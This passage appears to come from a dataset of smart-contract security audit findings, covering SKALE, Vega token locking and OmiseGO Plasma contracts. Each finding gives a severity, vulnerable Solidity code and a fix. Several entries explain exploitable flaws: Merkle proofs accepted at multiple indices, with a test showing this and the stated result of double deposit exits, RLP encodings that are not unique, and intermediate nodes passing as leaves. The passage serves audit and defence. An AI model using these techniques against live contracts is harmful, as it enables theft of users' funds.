require(month.add(1) >= sumSequence.firstUnprocessedMonth, \"Can't reduce value in the past\");\\n }\\n require(reducingCoefficient.numerator <= reducingCoefficient.denominator, \"Increasing of values is not implemented\");\\n if (sequence.firstUnprocessedMonth == 0) {\\n return;\\n }\\n uint value = getAndUpdateValue(sequence, month);\\n if (value == 0) {\\n return;\\n }\\n\\n uint newValue = sequence.value.mul(reducingCoefficient.numerator).div(reducingCoefficient.denominator);\\n if (hasSumSequence) {\\n subtract(sumSequence, sequence.value.sub(newValue), month);\\n }\\n sequence.value = newValue;\\n\\n for (uint i = month.add(1); i <= sequence.lastChangedMonth; ++i) {\\n uint newDiff = sequence.subtractDiff[i].mul(reducingCoefficient.numerator).div(reducingCoefficient.denominator);\\n if (hasSumSequence) {\\n sumSequence.subtractDiff[i] = sumSequence.subtractDiff[i].sub(sequence.subtractDiff[i].sub(newDiff));\\n }\\n sequence.subtractDiff[i] = newDiff;\\n }\\n}\\n\\nfunction reduce(\\n PartialDifferences storage sequence,\\n Fraction memory reducingCoefficient,\\n uint month) internal\\n{\\n require(month.add(1) >= sequence.firstUnprocessedMonth, \"Can't reduce value in the past\");\\n require(reducingCoefficient.numerator <= reducingCoefficient.denominator, \"Increasing of values is not implemented\");\\n if (sequence.firstUnprocessedMonth == 0) {\\n return;\\n }\\n uint value = getAndUpdateValue(sequence, month);\\n if (value == 0) {\\n return;\\n }\\n\\n sequence.value[month] = sequence.value[month].mul(reducingCoefficient.numerator).div(reducingCoefficient.denominator);\\n\\n for (uint i = month.add(1); i <= sequence.lastChangedMonth; ++i) {\\n sequence.subtractDiff[i] = sequence.subtractDiff[i].mul(reducingCoefficient.numerator).div(reducingCoefficient.denominator);\\n }\\n}\\n```\\nчResolution\\nFixed in skalenetwork/skale-manager#181\\nAvoid function overloading as a general guideline.чч```\\nfunction reduce(PartialDifferencesValue storage sequence, uint 
amount, uint month) internal returns (Fraction memory) {\\n require(month.add(1) >= sequence.firstUnprocessedMonth, \"Can't reduce value in the past\");\\n if (sequence.firstUnprocessedMonth == 0) {\\n return createFraction(0);\\n }\\n uint value = getAndUpdateValue(sequence, month);\\n if (value == 0) {\\n return createFraction(0);\\n }\\n\\n uint \\_amount = amount;\\n if (value < amount) {\\n \\_amount = value;\\n }\\n\\n Fraction memory reducingCoefficient = createFraction(value.sub(\\_amount), value);\\n reduce(sequence, reducingCoefficient, month);\\n return reducingCoefficient;\\n}\\n\\nfunction reduce(PartialDifferencesValue storage sequence, Fraction memory reducingCoefficient, uint month) internal {\\n reduce(\\n sequence,\\n sequence,\\n reducingCoefficient,\\n month,\\n false);\\n}\\n\\nfunction reduce(\\n PartialDifferencesValue storage sequence,\\n PartialDifferencesValue storage sumSequence,\\n Fraction memory reducingCoefficient,\\n uint month) internal\\n{\\n reduce(\\n sequence,\\n sumSequence,\\n reducingCoefficient,\\n month,\\n true);\\n}\\n\\nfunction reduce(\\n PartialDifferencesValue storage sequence,\\n PartialDifferencesValue storage sumSequence,\\n Fraction memory reducingCoefficient,\\n uint month,\\n bool hasSumSequence) internal\\n{\\n require(month.add(1) >= sequence.firstUnprocessedMonth, \"Can't reduce value in the past\");\\n if (hasSumSequence) {\\n require(month.add(1) >= sumSequence.firstUnprocessedMonth, \"Can't reduce value in the past\");\\n }\\n require(reducingCoefficient.numerator <= reducingCoefficient.denominator, \"Increasing of values is not implemented\");\\n if (sequence.firstUnprocessedMonth == 0) {\\n return;\\n }\\n uint value = getAndUpdateValue(sequence, month);\\n if (value == 0) {\\n return;\\n }\\n\\n uint newValue = sequence.value.mul(reducingCoefficient.numerator).div(reducingCoefficient.denominator);\\n if (hasSumSequence) {\\n subtract(sumSequence, sequence.value.sub(newValue), month);\\n }\\n 
sequence.value = newValue;\\n\\n for (uint i = month.add(1); i <= sequence.lastChangedMonth; ++i) {\\n uint newDiff = sequence.subtractDiff[i].mul(reducingCoefficient.numerator).div(reducingCoefficient.denominator);\\n if (hasSumSequence) {\\n sumSequence.subtractDiff[i] = sumSequence.subtractDiff[i].sub(sequence.subtractDiff[i].sub(newDiff));\\n }\\n sequence.subtractDiff[i] = newDiff;\\n }\\n}\\n\\nfunction reduce(\\n PartialDifferences storage sequence,\\n Fraction memory reducingCoefficient,\\n uint month) internal\\n{\\n require(month.add(1) >= sequence.firstUnprocessedMonth, \"Can't reduce value in the past\");\\n require(reducingCoefficient.numerator <= reducingCoefficient.denominator, \"Increasing of values is not implemented\");\\n if (sequence.firstUnprocessedMonth == 0) {\\n return;\\n }\\n uint value = getAndUpdateValue(sequence, month);\\n if (value == 0) {\\n return;\\n }\\n\\n sequence.value[month] = sequence.value[month].mul(reducingCoefficient.numerator).div(reducingCoefficient.denominator);\\n\\n for (uint i = month.add(1); i <= sequence.lastChangedMonth; ++i) {\\n sequence.subtractDiff[i] = sequence.subtractDiff[i].mul(reducingCoefficient.numerator).div(reducingCoefficient.denominator);\\n }\\n}\\n```\\n -ERC20Lockable - inconsistent locking statusчlowч`Vega_Token.is_tradable()` will incorrectly return `false` if the token is never manually unlocked by the owner but `unlock_time` has passed, which will automatically unlock trading.\\n```\\n/\\*\\*\\n \\* @dev locked status, only applicable before unlock\\_date\\n \\*/\\nbool public \\_is\\_locked = true;\\n\\n/\\*\\*\\n \\* @dev Modifier that only allows function to run if either token is unlocked or time has expired.\\n \\* Throws if called while token is locked.\\n \\*/\\nmodifier onlyUnlocked() {\\n require(!\\_is\\_locked || now > unlock\\_date);\\n \\_;\\n}\\n\\n/\\*\\*\\n \\* @dev Internal function that unlocks token. 
Can only be ran before expiration (give that it's irrelevant after)\\n \\*/\\nfunction \\_unlock() internal {\\n require(now <= unlock\\_date);\\n \\_is\\_locked = false;\\n```\\nчdeclare `_is_locked` as `private` instead of `public`\\ncreate a getter method that correctly returns the locking status\\n```\\nfunction \\_isLocked() internal view {\\n return !\\_is\\_locked || now > unlock\\_date;\\n}\\n```\\n\\nmake `modifier onlyUnlocked()` use the newly created getter (_isLocked())\\nmake `Vega_Token.is_tradeable()` use the newly created getter (_isLocked())\\n`_unlock()` should raise an errorcondition when called on an already unlocked contract\\nit could make sense to emit a “contract hast been unlocked” event for auditing purposesчч```\\n/\\*\\*\\n \\* @dev locked status, only applicable before unlock\\_date\\n \\*/\\nbool public \\_is\\_locked = true;\\n\\n/\\*\\*\\n \\* @dev Modifier that only allows function to run if either token is unlocked or time has expired.\\n \\* Throws if called while token is locked.\\n \\*/\\nmodifier onlyUnlocked() {\\n require(!\\_is\\_locked || now > unlock\\_date);\\n \\_;\\n}\\n\\n/\\*\\*\\n \\* @dev Internal function that unlocks token. Can only be ran before expiration (give that it's irrelevant after)\\n \\*/\\nfunction \\_unlock() internal {\\n require(now <= unlock\\_date);\\n \\_is\\_locked = false;\\n```\\n -Merkle.checkMembership allows existence proofs for the same leaf in multiple locations in the treeчhighч`checkMembership` is used by several contracts to prove that transactions exist in the child chain. The function uses a `leaf`, an `index`, and a `proof` to construct a hypothetical root hash. This constructed hash is compared to the passed in `rootHash` parameter. 
If the two are equivalent, the `proof` is considered valid.\\nThe proof is performed iteratively, and uses a pseudo-index (j) to determine whether the next proof element represents a “left branch” or “right branch”:\\n```\\nuint256 j = index;\\n// Note: We're skipping the first 32 bytes of `proof`, which holds the size of the dynamically sized `bytes`\\nfor (uint256 i = 32; i <= proof.length; i += 32) {\\n // solhint-disable-next-line no-inline-assembly\\n assembly {\\n proofElement := mload(add(proof, i))\\n }\\n if (j % 2 == 0) {\\n computedHash = keccak256(abi.encodePacked(NODE\\_SALT, computedHash, proofElement));\\n } else {\\n computedHash = keccak256(abi.encodePacked(NODE\\_SALT, proofElement, computedHash));\\n }\\n j = j / 2;\\n}\\n```\\n\\nIf `j` is even, the computed hash is placed before the next proof element. If `j` is odd, the computed hash is placed after the next proof element. After each iteration, `j` is decremented by `j` = `j` / 2.\\nBecause `checkMembership` makes no requirements on the height of the tree or the size of the proof relative to the provided `index`, it is possible to pass in invalid values for `index` that prove a leaf's existence in multiple locations in the tree.\\nBy modifying existing tests, we showed that for a tree with 3 leaves, leaf 2 can be proven to exist at indices 2, 6, and 10 using the same proof each time. 
The modified test can be found here: https://gist.github.com/wadeAlexC/01b60099282a026f8dc1ac85d83489fd#file-merkle-test-js-L40-L67\\n```\\nit('should accidentally allow different indices to use the same proof', async () => {\\n const rootHash = this.merkleTree.root;\\n const proof = this.merkleTree.getInclusionProof(leaves[2]);\\n\\n const result = await this.merkleContract.checkMembership(\\n leaves[2],\\n 2,\\n rootHash,\\n proof,\\n );\\n expect(result).to.be.true;\\n\\n const nextResult = await this.merkleContract.checkMembership(\\n leaves[2],\\n 6,\\n rootHash,\\n proof,\\n );\\n expect(nextResult).to.be.true;\\n\\n const nextNextResult = await this.merkleContract.checkMembership(\\n leaves[2],\\n 10,\\n rootHash,\\n proof,\\n );\\n expect(nextNextResult).to.be.true;\\n});\\n```\\n\\nConclusion\\nExit processing is meant to bypass exits processed more than once. This is implemented using an “output id” system, where each exited output should correspond to a unique id that gets flagged in the `ExitGameController` contract as it's exited. Before an exit is processed, its output id is calculated and checked against `ExitGameController`. If the output has already been exited, the exit being processed is deleted and skipped. Crucially, output id is calculated differently for standard transactions and deposit transactions: deposit output ids factor in the transaction index.\\nBy using the behavior described in this issue in conjunction with methods discussed in issue 5.8 and https://github.com/ConsenSys/omisego-morevp-audit-2019-10/issues/20, we showed that deposit transactions can be exited twice using indices `0` and `2**16`. 
Because of the distinct output id calculation, these exits have different output ids and can be processed twice, allowing users to exit double their deposited amount.\\nA modified `StandardExit.load.test.js` shows that exits are successfully enqueued with a transaction index of 65536: https://gist.github.com/wadeAlexC/4ad459b7510e512bc9556e7c919e0965#file-standardexit-load-test-js-L55чUse the length of the proof to determine the maximum allowed index. The passed-in index should satisfy the following criterion: `index < 2**(proof.length/32)`. Additionally, ensure range checks on transaction position decoding are sufficiently restrictive (see https://github.com/ConsenSys/omisego-morevp-audit-2019-10/issues/20).\\nCorresponding issue in plasma-contracts repo: https://github.com/omisego/plasma-contracts/issues/546чч```\\nuint256 j = index;\\n// Note: We're skipping the first 32 bytes of `proof`, which holds the size of the dynamically sized `bytes`\\nfor (uint256 i = 32; i <= proof.length; i += 32) {\\n // solhint-disable-next-line no-inline-assembly\\n assembly {\\n proofElement := mload(add(proof, i))\\n }\\n if (j % 2 == 0) {\\n computedHash = keccak256(abi.encodePacked(NODE\\_SALT, computedHash, proofElement));\\n } else {\\n computedHash = keccak256(abi.encodePacked(NODE\\_SALT, proofElement, computedHash));\\n }\\n j = j / 2;\\n}\\n```\\n -Improper initialization of spending condition abstraction allows “v2 transactions” to exit using PaymentExitGameчhighч`PaymentOutputToPaymentTxCondition` is an abstraction around the transaction signature check needed for many components of the exit games. 
Its only function, `verify`, returns `true` if one transaction (inputTxBytes) is spent by another transaction (spendingTxBytes):\\n```\\nfunction verify(\\n bytes calldata inputTxBytes,\\n uint16 outputIndex,\\n uint256 inputTxPos,\\n bytes calldata spendingTxBytes,\\n uint16 inputIndex,\\n bytes calldata signature,\\n bytes calldata /\\*optionalArgs\\*/\\n)\\n external\\n view\\n returns (bool)\\n{\\n PaymentTransactionModel.Transaction memory inputTx = PaymentTransactionModel.decode(inputTxBytes);\\n require(inputTx.txType == supportInputTxType, \"Input tx is an unsupported payment tx type\");\\n\\n PaymentTransactionModel.Transaction memory spendingTx = PaymentTransactionModel.decode(spendingTxBytes);\\n require(spendingTx.txType == supportSpendingTxType, \"The spending tx is an unsupported payment tx type\");\\n\\n UtxoPosLib.UtxoPos memory utxoPos = UtxoPosLib.build(TxPosLib.TxPos(inputTxPos), outputIndex);\\n require(\\n spendingTx.inputs[inputIndex] == bytes32(utxoPos.value),\\n \"Spending tx points to the incorrect output UTXO position\"\\n );\\n\\n address payable owner = inputTx.outputs[outputIndex].owner();\\n require(owner == ECDSA.recover(eip712.hashTx(spendingTx), signature), \"Tx in not signed correctly\");\\n\\n return true;\\n}\\n```\\n\\nVerification process\\nThe verification process is relatively straightforward. The contract performs some basic input validation, checking that the input transaction's `txType` matches `supportInputTxType`, and that the spending transaction's `txType` matches `supportSpendingTxType`. 
These values are set during construction.\\nNext, `verify` checks that the spending transaction contains an input that matches the position of one of the input transaction's outputs.\\nFinally, `verify` performs an EIP-712 hash on the spending transaction, and ensures it is signed by the owner of the output in question.\\nImplications of the abstraction\\nThe abstraction used requires several files to be visited to fully understand the function of each line of code: `ISpendingCondition`, `PaymentEIP712Lib`, `UtxoPosLib`, `TxPosLib`, `PaymentTransactionModel`, `PaymentOutputModel`, `RLPReader`, `ECDSA`, and `SpendingConditionRegistry`. Additionally, the abstraction obfuscates the underlying spending condition verification primitive where used.\\nFinally, understanding the abstraction requires an understanding of how `SpendingConditionRegistry` is initialized, as well as the nature of its relationship with `PlasmaFramework` and `ExitGameRegistry`. The aforementioned `txType` values, `supportInputTxType` and `supportSpendingTxType`, are set during construction. Their use in `ExitGameRegistry` seems to suggest they are intended to represent different versions of transaction types, and that separate exit game contracts are meant to handle different transaction types:\\n```\\n/\\*\\*\\n \\* @notice Registers an exit game within the PlasmaFramework. 
Only the maintainer can call the function.\\n \\* @dev Emits ExitGameRegistered event to notify clients\\n \\* @param \\_txType The tx type where the exit game wants to register\\n \\* @param \\_contract Address of the exit game contract\\n \\* @param \\_protocol The transaction protocol, either 1 for MVP or 2 for MoreVP\\n \\*/\\nfunction registerExitGame(uint256 \\_txType, address \\_contract, uint8 \\_protocol) public onlyFrom(getMaintainer()) {\\n require(\\_txType != 0, \"Should not register with tx type 0\");\\n require(\\_contract != address(0), \"Should not register with an empty exit game address\");\\n require(\\_exitGames[\\_txType] == address(0), \"The tx type is already registered\");\\n require(\\_exitGameToTxType[\\_contract] == 0, \"The exit game contract is already registered\");\\n require(Protocol.isValidProtocol(\\_protocol), \"Invalid protocol value\");\\n\\n \\_exitGames[\\_txType] = \\_contract;\\n \\_exitGameToTxType[\\_contract] = \\_txType;\\n \\_protocols[\\_txType] = \\_protocol;\\n \\_exitGameQuarantine.quarantine(\\_contract);\\n\\n emit ExitGameRegistered(\\_txType, \\_contract, \\_protocol);\\n}\\n```\\n\\nMigration and initialization\\nThe migration script seems to corroborate this interpretation:\\ncode/plasma_framework/migrations/5_deploy_and_register_payment_exit_game.js:L109-L124\\n```\\n// handle spending condition\\nawait deployer.deploy(\\n PaymentOutputToPaymentTxCondition,\\n plasmaFramework.address,\\n PAYMENT\\_OUTPUT\\_TYPE,\\n PAYMENT\\_TX\\_TYPE,\\n);\\nconst paymentToPaymentCondition = await PaymentOutputToPaymentTxCondition.deployed();\\n\\nawait deployer.deploy(\\n PaymentOutputToPaymentTxCondition,\\n plasmaFramework.address,\\n PAYMENT\\_OUTPUT\\_TYPE,\\n PAYMENT\\_V2\\_TX\\_TYPE,\\n);\\nconst paymentToPaymentV2Condition = await PaymentOutputToPaymentTxCondition.deployed();\\n```\\n\\nThe migration script shown above deploys two different versions of `PaymentOutputToPaymentTxCondition`. 
The first sets `supportInputTxType` and `supportSpendingTxType` to `PAYMENT_OUTPUT_TYPE` and `PAYMENT_TX_TYPE`, respectively. The second sets those same variables to `PAYMENT_OUTPUT_TYPE` and `PAYMENT_V2_TX_TYPE`, respectively.\\nThe migration script then registers both of these contracts in `SpendingConditionRegistry`, and then calls `renounceOwnership`, freezing the spending conditions registered permanently:\\ncode/plasma_framework/migrations/5_deploy_and_register_payment_exit_game.js:L126-L135\\n```\\nconsole.log(`Registering paymentToPaymentCondition (${paymentToPaymentCondition.address}) to spendingConditionRegistry`);\\nawait spendingConditionRegistry.registerSpendingCondition(\\n PAYMENT\\_OUTPUT\\_TYPE, PAYMENT\\_TX\\_TYPE, paymentToPaymentCondition.address,\\n);\\n\\nconsole.log(`Registering paymentToPaymentV2Condition (${paymentToPaymentV2Condition.address}) to spendingConditionRegistry`);\\nawait spendingConditionRegistry.registerSpendingCondition(\\n PAYMENT\\_OUTPUT\\_TYPE, PAYMENT\\_V2\\_TX\\_TYPE, paymentToPaymentV2Condition.address,\\n);\\nawait spendingConditionRegistry.renounceOwnership();\\n```\\n\\nFinally, the migration script registers a single exit game contract in PlasmaFramework:\\ncode/plasma_framework/migrations/5_deploy_and_register_payment_exit_game.js:L137-L143\\n```\\n// register the exit game to framework\\nawait plasmaFramework.registerExitGame(\\n PAYMENT\\_TX\\_TYPE,\\n paymentExitGame.address,\\n config.frameworks.protocols.moreVp,\\n { from: maintainerAddress },\\n);\\n```\\n\\nNote that the associated `_txType` is permanently associated with the deployed exit game contract:\\n```\\n/\\*\\*\\n \\* @notice Registers an exit game within the PlasmaFramework. 
Only the maintainer can call the function.\\n \\* @dev Emits ExitGameRegistered event to notify clients\\n \\* @param \\_txType The tx type where the exit game wants to register\\n \\* @param \\_contract Address of the exit game contract\\n \\* @param \\_protocol The transaction protocol, either 1 for MVP or 2 for MoreVP\\n \\*/\\nfunction registerExitGame(uint256 \\_txType, address \\_contract, uint8 \\_protocol) public onlyFrom(getMaintainer()) {\\n require(\\_txType != 0, \"Should not register with tx type 0\");\\n require(\\_contract != address(0), \"Should not register with an empty exit game address\");\\n require(\\_exitGames[\\_txType] == address(0), \"The tx type is already registered\");\\n require(\\_exitGameToTxType[\\_contract] == 0, \"The exit game contract is already registered\");\\n require(Protocol.isValidProtocol(\\_protocol), \"Invalid protocol value\");\\n\\n \\_exitGames[\\_txType] = \\_contract;\\n \\_exitGameToTxType[\\_contract] = \\_txType;\\n \\_protocols[\\_txType] = \\_protocol;\\n \\_exitGameQuarantine.quarantine(\\_contract);\\n\\n emit ExitGameRegistered(\\_txType, \\_contract, \\_protocol);\\n}\\n```\\n\\nConclusion\\nCrucially, this association is never used. It is implied heavily that transactions with some `txType` must use a certain registered exit game contract. In fact, this is not true. When using `PaymentExitGame`, its routers, and their associated controllers, the `txType` is invariably inferred from the encoded transaction, not from the mappings in `ExitGameRegistry`. If initialized as-is, both `PAYMENT_TX_TYPE` and `PAYMENT_V2_TX_TYPE` transactions may be exited using `PaymentExitGame`, provided they exist in the plasma chain.чRemove `PaymentOutputToPaymentTxCondition` and `SpendingConditionRegistry`\\nImplement checks for specific spending conditions directly in exit game controllers. 
Emphasize clarity of function: ensure it is clear when called from the top level that a signature verification check and spending condition check are being performed.\\nIf the inferred relationship between `txType` and `PaymentExitGame` is correct, ensure that each `PaymentExitGame` router checks for its supported `txType`. Alternatively, the check could be made in `PaymentExitGame` itself.\\nCorresponding issue in plasma-contracts repo: https://github.com/omisego/plasma-contracts/issues/472чч```\\nfunction verify(\\n bytes calldata inputTxBytes,\\n uint16 outputIndex,\\n uint256 inputTxPos,\\n bytes calldata spendingTxBytes,\\n uint16 inputIndex,\\n bytes calldata signature,\\n bytes calldata /\\*optionalArgs\\*/\\n)\\n external\\n view\\n returns (bool)\\n{\\n PaymentTransactionModel.Transaction memory inputTx = PaymentTransactionModel.decode(inputTxBytes);\\n require(inputTx.txType == supportInputTxType, \"Input tx is an unsupported payment tx type\");\\n\\n PaymentTransactionModel.Transaction memory spendingTx = PaymentTransactionModel.decode(spendingTxBytes);\\n require(spendingTx.txType == supportSpendingTxType, \"The spending tx is an unsupported payment tx type\");\\n\\n UtxoPosLib.UtxoPos memory utxoPos = UtxoPosLib.build(TxPosLib.TxPos(inputTxPos), outputIndex);\\n require(\\n spendingTx.inputs[inputIndex] == bytes32(utxoPos.value),\\n \"Spending tx points to the incorrect output UTXO position\"\\n );\\n\\n address payable owner = inputTx.outputs[outputIndex].owner();\\n require(owner == ECDSA.recover(eip712.hashTx(spendingTx), signature), \"Tx in not signed correctly\");\\n\\n return true;\\n}\\n```\\n -RLPReader - Leading zeroes allow multiple valid encodings and exit / output ids for the same transactionчhighчThe current implementation of RLP decoding can take 2 different `txBytes` and decode them to the same structure. Specifically, the `RLPReader.toUint` method can decode 2 different types of bytes to the same number. 
For example:\\n`0x821234` is decoded to `uint(0x1234)`\\n`0x83001234` is decoded to `uint(0x1234)`\\n`0xc101` can decode to `uint(1)`, even though the tag specifies a short list\\n`0x01` can decode to `uint(1)`, even though the tag specifies a single byte\\nAs explanation for this encoding:\\n`0x821234` is broken down into 2 parts:\\n`0x82` - represents `0x80` (the string tag) + `0x02` bytes encoded\\n`0x1234` - are the encoded bytes\\nThe same for 0x83001234:\\n`0x83` - represents `0x80` (the string tag) + `0x03` bytes encoded\\n`0x001234` - are the encoded bytes\\nThe current implementation casts the encoded bytes into a uint256, so these different encodings are interpreted by the contracts as the same number:\\n`uint(0x1234) = uint(0x001234)`\\n```\\nresult := mload(memPtr)\\n```\\n\\nHaving different valid encodings for the same data is a problem because the encodings are used to create hashes that are used as unique ids. This means that multiple ids can be created for the same data. 
The data should only have one possible id.\\nThe encoding is used to create ids in these parts of the code:\\n```\\nreturn keccak256(abi.encodePacked(\\_txBytes, \\_outputIndex, \\_utxoPosValue));\\n```\\n\\n```\\nreturn keccak256(abi.encodePacked(\\_txBytes, \\_outputIndex));\\n```\\n\\n```\\nbytes32 hashData = keccak256(abi.encodePacked(\\_txBytes, \\_utxoPos.value));\\n```\\n\\n```\\nreturn uint160((uint256(keccak256(\\_txBytes)) 105).setBit(151));\\n```\\n\\n```\\nbytes32 leafData = keccak256(data.txBytes);\\n```\\n\\nOther methods that are affected because they rely on the return values of these methods:чEnforce strict-length decoding for `txBytes`, and specify that `uint` is decoded from a 32-byte short string.\\nEnforcing a 32-byte length for `uint` means that `0x1234` should always be encoded as:\\n`0xa00000000000000000000000000000000000000000000000000000000000001234`\\n`0xa0` represents the tag + the length: `0x80 + 32`\\n`0000000000000000000000000000000000000000000000000000000000001234` is the number 32 bytes long with leading zeroes\\nUnfortunately, using leading zeroes is against the RLP spec:\\nhttps://github.com/ethereum/wiki/wiki/RLP\\npositive RLP integers must be represented in big endian binary form with no leading zeroes\\nThis means that libraries interacting with OMG contracts which are going to correctly and fully implement the spec will generate “incorrect” encodings for uints; encodings that are not going to be recognized by the OMG contracts.\\nFully correct spec encoding: `0x821234`. Proposed encoding in this solution: `0xa00000000000000000000000000000000000000000000000000000000000001234`.\\nSimilarly enforce restrictions where they can be added; this is possible because of the strict structure format that needs to be encoded.\\nSome other potential solutions are included below. 
Note that these solutions are not recommended for reasons included below:\\nNormalize the encoding that gets passed to methods that hash the transaction for use as an id:\\nThis can be implemented in the methods that call `keccak256` on `txBytes` and should decode and re-encode the passed `txBytes` in order to normalize the passed encoding.\\na `txBytes` is passed\\nthe `txBytes` are decoded into structure: `tmpDecodedStruct` = decode(txBytes)\\nthe `tmpDecodedStruct` is re-encoded in order to normalize it: `normalizedTxBytes = encode(txBytes)`\\nThis method is not recommended because it needs a Solidity encoder to be implemented and a lot of gas will be used to decode and re-encode the initial `txBytes`.\\nCorrectly and fully implement RLP decoding\\nThis is another solution that adds a lot of code and is prone to errors.\\nThe solution would be to enforce all of the restrictions when decoding and not accept any encoding that doesn't fully follow the spec. This for example means that is should not accept uints with leading zeroes.\\nThis is a problem because it needs a lot of code that is not easy to write in Solidity (or EVM).чч```\\nresult := mload(memPtr)\\n```\\n -Recommendation: Remove TxFinalizationModel and TxFinalizationVerifier. Implement stronger checks in Merkleчmediumч`TxFinalizationVerifier` is an abstraction around the block inclusion check needed for many of the features of plasma exit games. It uses a struct defined in `TxFinalizationModel` as inputs to its two functions: `isStandardFinalized` and `isProtocolFinalized`.\\n`isStandardFinalized` returns the result of an inclusion proof. 
Although there are several branches, only the first is used:\\n```\\n/\\*\\*\\n\\* @notice Checks whether a transaction is \"standard finalized\"\\n\\* @dev MVP: requires that both inclusion proof and confirm signature is checked\\n\\* @dev MoreVp: checks inclusion proof only\\n\\*/\\nfunction isStandardFinalized(Model.Data memory data) public view returns (bool) {\\n if (data.protocol == Protocol.MORE\\_VP()) {\\n return checkInclusionProof(data);\\n } else if (data.protocol == Protocol.MVP()) {\\n revert(\"MVP is not yet supported\");\\n } else {\\n revert(\"Invalid protocol value\");\\n }\\n}\\n```\\n\\n`isProtocolFinalized` is unused:\\n```\\n/\\*\\*\\n\\* @notice Checks whether a transaction is \"protocol finalized\"\\n\\* @dev MVP: must be standard finalized\\n\\* @dev MoreVp: allows in-flight tx, so only checks for the existence of the transaction\\n\\*/\\nfunction isProtocolFinalized(Model.Data memory data) public view returns (bool) {\\n if (data.protocol == Protocol.MORE\\_VP()) {\\n return data.txBytes.length > 0;\\n } else if (data.protocol == Protocol.MVP()) {\\n revert(\"MVP is not yet supported\");\\n } else {\\n revert(\"Invalid protocol value\");\\n }\\n}\\n```\\n\\nThe abstraction used introduces branching logic and requires several files to be visited to fully understand the function of each line of code: `ITxFinalizationVerifier`, `TxFinalizationModel`, `TxPosLib`, `Protocol`, `BlockController`, and `Merkle`. Additionally, the abstraction obfuscates the underlying inclusion proof primitive when used in the exit game contracts. 
`isStandardFinalized` is not clearly an inclusion proof, and `isProtocolFinalized` simply adds confusion.\\n```\\nfunction checkInclusionProof(Model.Data memory data) private view returns (bool) {\\n if (data.inclusionProof.length == 0) {\\n return false;\\n }\\n\\n (bytes32 root,) = data.framework.blocks(data.txPos.blockNum());\\n bytes32 leafData = keccak256(data.txBytes);\\n return Merkle.checkMembership(\\n leafData, data.txPos.txIndex(), root, data.inclusionProof\\n );\\n}\\n```\\n\\nBy introducing the abstraction of `TxFinalizationVerifier`, the input validation performed by `Merkle` is split across multiple files, and the reasonable-seeming decision of calling `Merkle.checkMembership` directly becomes unsafe. In fact, this occurs in one location in the contracts:\\n```\\nfunction verifyAndDeterminePositionOfTransactionIncludedInBlock(\\n bytes memory txbytes,\\n UtxoPosLib.UtxoPos memory utxoPos,\\n bytes32 root,\\n bytes memory inclusionProof\\n)\\n private\\n pure\\n returns(uint256)\\n{\\n bytes32 leaf = keccak256(txbytes);\\n require(\\n Merkle.checkMembership(leaf, utxoPos.txIndex(), root, inclusionProof),\\n \"Transaction is not included in block of Plasma chain\"\\n );\\n\\n return utxoPos.value;\\n}\\n```\\nчPaymentChallengeIFEOutputSpent.verifyInFlightTransactionStandardFinalized:\\n```\\nrequire(controller.txFinalizationVerifier.isStandardFinalized(finalizationData), \"In-flight transaction not finalized\");\\n```\\n\\nPaymentChallengeIFENotCanonical.verifyCompetingTxFinalized:\\n```\\nrequire(self.txFinalizationVerifier.isStandardFinalized(finalizationData), \"Failed to verify the position of competing tx\");\\n```\\n\\nPaymentStartInFlightExit.verifyInputTransactionIsStandardFinalized:\\n```\\nrequire(exitData.controller.txFinalizationVerifier.isStandardFinalized(finalizationData),\\n \"Input transaction is not standard finalized\");\\n```\\n\\nIf none of the above recommendations are implemented, ensure that `PaymentChallengeIFENotCanonical` 
uses the abstraction `TxFinalizationVerifier` so that a length check is performed on the inclusion proof.\nCorresponding issue in plasma-contracts repo: https://github.com/omisego/plasma-contracts/issues/471чч```\n/\*\*\n\* @notice Checks whether a transaction is \"standard finalized\"\n\* @dev MVP: requires that both inclusion proof and confirm signature is checked\n\* @dev MoreVp: checks inclusion proof only\n\*/\nfunction isStandardFinalized(Model.Data memory data) public view returns (bool) {\n if (data.protocol == Protocol.MORE\_VP()) {\n return checkInclusionProof(data);\n } else if (data.protocol == Protocol.MVP()) {\n revert(\"MVP is not yet supported\");\n } else {\n revert(\"Invalid protocol value\");\n }\n}\n```\n -Merkle - The implementation does not enforce inclusion of leaf nodes.чmediumчAn observation with the current Merkle tree implementation is that it may be possible to validate nodes other than leaves. This is done by providing `checkMembership` with a reference to a hash within the tree, rather than a leaf.\n```\n/\*\*\n \* @notice Checks that a leaf hash is contained in a root hash\n \* @param leaf Leaf hash to verify\n \* @param index Position of the leaf hash in the Merkle tree\n \* @param rootHash Root of the Merkle tree\n \* @param proof A Merkle proof demonstrating membership of the leaf hash\n \* @return True, if the leaf hash is in the Merkle tree; otherwise, False\n\*/\nfunction checkMembership(bytes32 leaf, uint256 index, bytes32 rootHash, bytes memory proof)\n internal\n pure\n returns (bool)\n{\n require(proof.length % 32 == 0, \"Length of Merkle proof must be a multiple of 32\");\n\n bytes32 proofElement;\n bytes32 computedHash = leaf;\n uint256 j = index;\n // Note: We're skipping the first 32 bytes of `proof`, which holds the size of the dynamically sized `bytes`\n for (uint256 i = 32; i <= proof.length; i += 32) {\n // solhint-disable-next-line no-inline-assembly\n assembly 
{\\n proofElement := mload(add(proof, i))\\n }\\n if (j % 2 == 0) {\\n computedHash = keccak256(abi.encodePacked(computedHash, proofElement));\\n } else {\\n computedHash = keccak256(abi.encodePacked(proofElement, computedHash));\\n }\\n j = j / 2;\\n }\\n\\n return computedHash == rootHash;\\n}\\n```\\n\\nThe current implementation will validate the provided “leaf” and return `true`. This is a known problem of Merkle trees https://en.wikipedia.org/wiki/Merkle_tree#Second_preimage_attack.\\nProvide a hash from within the Merkle tree as the `leaf` argument. The index has to match the index of that node in regards to its current level in the tree. The `rootHash` has to be the correct Merkle tree `rootHash`. The proof has to skip the necessary number of levels because the nodes “underneath” the provided “leaf” will not be processed.чA remediation needs a fixed Merkle tree size as well as the addition of a byte prepended to each node in the tree. Another way would be to create a structure for the Merkle node and mark it as `leaf` or no `leaf`.\\nCorresponding issue in plasma-contracts repo: https://github.com/omisego/plasma-contracts/issues/425чч```\\n/\\*\\*\\n \\* @notice Checks that a leaf hash is contained in a root hash\\n \\* @param leaf Leaf hash to verify\\n \\* @param index Position of the leaf hash in the Merkle tree\\n \\* @param rootHash Root of the Merkle tree\\n \\* @param proof A Merkle proof demonstrating membership of the leaf hash\\n \\* @return True, if the leaf hash is in the Merkle tree; otherwise, False\\n\\*/\\nfunction checkMembership(bytes32 leaf, uint256 index, bytes32 rootHash, bytes memory proof)\\n internal\\n pure\\n returns (bool)\\n{\\n require(proof.length % 32 == 0, \"Length of Merkle proof must be a multiple of 32\");\\n\\n bytes32 proofElement;\\n bytes32 computedHash = 